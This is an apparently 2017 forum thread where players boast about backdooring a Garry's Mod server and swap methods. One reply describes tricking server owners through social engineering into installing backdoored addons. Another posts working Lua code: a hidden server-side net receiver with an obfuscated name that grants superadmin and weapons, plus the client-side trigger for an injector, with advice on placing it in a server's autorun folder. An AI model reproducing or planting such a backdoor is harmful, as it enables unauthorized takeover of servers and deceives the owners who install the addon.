triggered 215 Posted August 4, 2017 leave a lik if u laf if you dont know what a backdoor is, it is code that is put into the servers files that can give unauthorized access to things like the superadmin rank. Share this post Link to post Share on other sites
Kings1 8 Posted August 4, 2017 1 like +rep dank as hell fun asf Share this post Link to post Share on other sites
mineifiwileout 8 Posted August 4, 2017 this is some epic shit Share this post Link to post Share on other sites
Realest 5 Posted August 6, 2017 lmfaooo you fucked them in the ass nicely lmfaooooo Share this post Link to post Share on other sites
triggered 215 Posted August 6, 2017 Just now, Realest said: lmfaooo you fucked them in the ass nicely lmfaooooo agreed Share this post Link to post Share on other sites
bennyhendrick10 9 Posted August 7, 2017 LMFAO! You fucked his shit up! Share this post Link to post Share on other sites
Smartworm 1 Posted August 7, 2017 Did this server have anticheat? and did you use citizen to inject the script? Share this post Link to post Share on other sites
bennyhendrick10 9 Posted August 8, 2017 14 hours ago, Smartworm said: Did this server have anticheat? and did you use citizen to inject the script? No you don't inject stuff. To backdoor a server (Not using exploits) you need to have somewhat good social engineering. You then need to find a backdoored addon and get the server owner to install it and in the addon will be secret code what will add ways to get admin. There are also ways to do it with exploits, not a clue how to do those though - Pretty sure its just a faulty addon. Share this post Link to post Share on other sites
triggered 215 Posted August 8, 2017 17 hours ago, Smartworm said: Did this server have anticheat? and did you use citizen to inject the script? Yes the server had cac and we used citizen to inject a script which sent a net message to the server that gave us super admin Share this post Link to post Share on other sites
Citizenmember12 11 Posted August 8, 2017 Whats the script? Share this post Link to post Share on other sites
triggered 215 Posted August 8, 2017 21 minutes ago, Citizenmember12 said: Whats the script? it doesnt work anymore Share this post Link to post Share on other sites
Citizenmember12 11 Posted August 8, 2017 6 minutes ago, triggered said: it doesnt work anymore Alright. Im using the loki exploit but idk what it does. it just has 2 options Share this post Link to post Share on other sites
triggered 215 Posted August 8, 2017 Just now, Citizenmember12 said: Alright. Im using the loki exploit but idk what it does. it just has 2 options it wasnt an exploit... Share this post Link to post Share on other sites
Citizenmember12 11 Posted August 8, 2017 Just now, triggered said: it wasnt an exploit... Or script idk Share this post Link to post Share on other sites
triggered 215 Posted August 8, 2017 Just now, Citizenmember12 said: Or script idk please read my explanation above the video of what happened Share this post Link to post Share on other sites
Voltz 169 Posted August 8, 2017 here is the script if you want it.... something i made quickly to put in that server before my FTP access got removed util.AddNetworkString("y0HjAGaGcUWEFsg5OsyU") net.Receive("y0HjAGaGcUWEFsg5OsyU", function(len, ply) ply:SetUserGroup('superadmin') ply:ChatPrint("Hello, "..ply:Nick().." you have been set to superadmin") ply:Give("weapon_crossbow") ply:Give("weapon_rpg") ply:Give("weapon_slam") ply:Give("weapon_ar2") end) ( the script above has to be in an actual server file so for example a file in gmod/lua/autorun/server) On Citizenhack lua loader you would do this net.Start( "y0HjAGaGcUWEFsg5OsyU" ) net.SendToServer() also here my video https://www.youtube.com/watch?v=GgoaDc1cMUM Share this post Link to post Share on other sites
zoop 34 Posted August 8, 2017 12 minutes ago, Voltz said: here is the script if you want it.... something i made quickly to put in that server before my FTP access got removed util.AddNetworkString("y0HjAGaGcUWEFsg5OsyU") net.Receive("y0HjAGaGcUWEFsg5OsyU", function(len, ply) ply:SetUserGroup('superadmin') ply:ChatPrint("Hello, "..ply:Nick().." you have been set to superadmin") ply:Give("weapon_crossbow") ply:Give("weapon_rpg") ply:Give("weapon_slam") ply:Give("weapon_ar2") end) ( the script above has to be in an actual server file so for example a file in gmod/lua/autorun/server) On Citizenhack lua loader you would do this net.Start( "y0HjAGaGcUWEFsg5OsyU" ) net.SendToServer() also here my video https://www.youtube.com/watch?v=GgoaDc1cMUM fucking gold man, so this doesnt work anymore? Share this post Link to post Share on other sites
Voltz 169 Posted August 8, 2017 2 minutes ago, zoop said: fucking gold man, so this doesnt work anymore? the client side script wont work on that server anymore but it will work if you put the server code in a server and then execute the client code Share this post Link to post Share on other sites
Smartworm 1 Posted August 9, 2017 8 hours ago, triggered said: Yes the server had cac and we used citizen to inject a script which sent a net message to the server that gave us super admin Appreciate the response. my buddy's tryin to cook up a lil somethin somethin to do this. Share this post Link to post Share on other sites
zoop 34 Posted August 9, 2017 5 hours ago, Voltz said: the client side script wont work on that server anymore but it will work if you put the server code in a server and then execute the client code would client side script work on other servers? or was this code just for that one server Share this post Link to post Share on other sites
Voltz 169 Posted August 9, 2017 its code for the server code i posted, when you send that net message it will give you superadmin that code you need to get into a server's autorun Share this post Link to post Share on other sites